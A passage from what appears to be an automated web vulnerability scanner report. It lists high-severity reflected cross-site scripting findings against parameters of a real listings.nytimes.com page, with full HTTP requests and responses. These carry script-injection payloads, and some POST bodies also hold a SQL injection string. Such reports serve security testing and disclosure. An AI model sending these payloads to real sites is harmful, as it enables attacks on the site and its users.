c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-29731122780<script>alert(1)</script>00cef0b2819&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:33:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-29731122780<script>alert(1)</script>00cef0b2819&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-
...[SNIP]...

4.276. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsB parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsB request parameter is copied into the HTML document as plain text between tags. The payload 48bc8<script>alert(1)</script>2a2eaea1af5 was submitted in the sLsIdsB parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-54535948bc8<script>alert(1)</script>2a2eaea1af5&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:34:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-54535948bc8<script>alert(1)</script>2a2eaea1af5&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-
...[SNIP]...

4.277. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsB parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsB request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 346f0"><script>alert(1)</script>1095c55addd23629b was submitted in the sLsIdsB parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359346f0"><script>alert(1)</script>1095c55addd23629b&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91527
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRQSAS=NHLKNADAOKBAAIPDKNABNLHG; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsB" value="125-551828,125-552791,125-552803,125-453304,125-552666,125-521482,125-521477,125-521479,125-488823,125-545359346f0"><script>alert(1)</script>1095c55addd23629b">
...[SNIP]...

4.278. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsC parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93663"><script>alert(1)</script>2a6ea7887f850e432 was submitted in the sLsIdsC parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-52612893663"><script>alert(1)</script>2a6ea7887f850e432&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91524
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRQSAS=OHLKNADAEGJAMNLDLPOEHPPE; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsC" value="125-527579,125-525464,125-527584,125-475581,125-510064,125-565038,125-554987,125-559008,125-525927,125-52612893663"><script>alert(1)</script>2a6ea7887f850e432">
...[SNIP]...

4.279. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsC parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsC request parameter is copied into the HTML document as plain text between tags. The payload 2b76a<script>alert(1)</script>fc5e5898970 was submitted in the sLsIdsC parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-5261282b76a<script>alert(1)</script>fc5e5898970&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:35:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-5261282b76a<script>alert(1)</script>fc5e5898970&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-
...[SNIP]...

4.280. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsD parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsD request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5675"><script>alert(1)</script>0e693292606de819f was submitted in the sLsIdsD parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

